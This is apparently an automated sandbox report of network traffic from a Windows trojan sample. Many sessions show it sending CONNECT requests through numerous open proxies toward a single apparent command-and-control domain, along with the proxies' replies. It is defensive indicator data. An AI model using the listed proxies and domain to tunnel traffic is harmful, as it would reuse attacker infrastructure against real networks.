                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1479192.168.2.85431027.76.128.246253955828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.513115883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1480192.168.2.849733188.164.196.31494265828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.555932045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.581676006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.695198059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.694998980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:01.694720030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:13.775667906 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:25.929094076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1481192.168.2.854339172.67.53.215805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.556076050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.643106937 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1482192.168.2.84974291.189.237.7880805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.556169987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.695027113 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.695508003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.788813114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1483192.168.2.854262194.247.173.1780805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.556725025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.581732988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1484192.168.2.854326104.23.125.117805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.564358950 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.651794910 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1485192.168.2.84978323.225.72.12535035828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.571142912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.581732988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.695199013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.193372011 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1486192.168.2.85436474.119.147.20941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.571142912 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1487192.168.2.8543373.10.93.5031285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.601099014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.759404898 CET167INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.7
                                                                                Server: squid/6.0.0-20220501-re899e0c27
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1488192.168.2.85436220.111.54.1681235828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.601391077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.771904945 CET319INHTTP/1.1 403 Forbidden
                                                                                Server: squid
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 17
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                X-Cache: MISS from cdn-fintech.info
                                                                                X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                Connection: keep-alive
                                                                                Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                Data Ascii: ERR_ACCESS_DENIED


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1489192.168.2.854360116.203.28.43805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.611602068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.808773041 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1490192.168.2.854356206.220.175.241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.611602068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1491192.168.2.85435185.214.118.98805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.611835957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.791393995 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.23.1
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1492192.168.2.854368168.195.203.1069995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.611967087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.179332972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.440830946 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1493192.168.2.85437020.111.54.16805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.654664040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.825519085 CET319INHTTP/1.1 403 Forbidden
                                                                                Server: squid
                                                                                Mime-Version: 1.0
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html;charset=utf-8
                                                                                Content-Length: 17
                                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                X-Cache: MISS from cdn-fintech.info
                                                                                X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                Connection: keep-alive
                                                                                Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                Data Ascii: ERR_ACCESS_DENIED


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1494192.168.2.85438723.152.40.1550505828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.669990063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1495192.168.2.85438294.30.152.172805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.670082092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1496192.168.2.849809165.16.27.10919815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.670902014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1497192.168.2.854359115.244.127.164805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.677508116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1498192.168.2.8543661.15.62.1256785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.677964926 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1499192.168.2.854403104.27.15.161805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.678184032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.766330004 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1500192.168.2.85437243.251.132.13380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.679521084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1501192.168.2.85438347.243.114.19281805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.715747118 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.025337934 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:37 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1502192.168.2.854375122.3.41.15480905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.715909004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.341285944 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1503192.168.2.854381171.254.218.18210805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.715979099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1504192.168.2.85422885.172.60.20211815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.716734886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1505192.168.2.85438847.74.226.850015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.717506886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1506192.168.2.849893103.197.71.7805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.731384993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882422924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.882829905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.991753101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1507192.168.2.84995192.204.135.37229425828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.731384993 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882359982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.882853031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1508192.168.2.854345139.255.45.6756785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.731642008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1509192.168.2.85439243.133.136.20888005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.750808954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1510192.168.2.85439136.64.238.8210805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.756467104 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:38.491928101 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1511192.168.2.849996212.110.188.202344095828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:37.774657011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
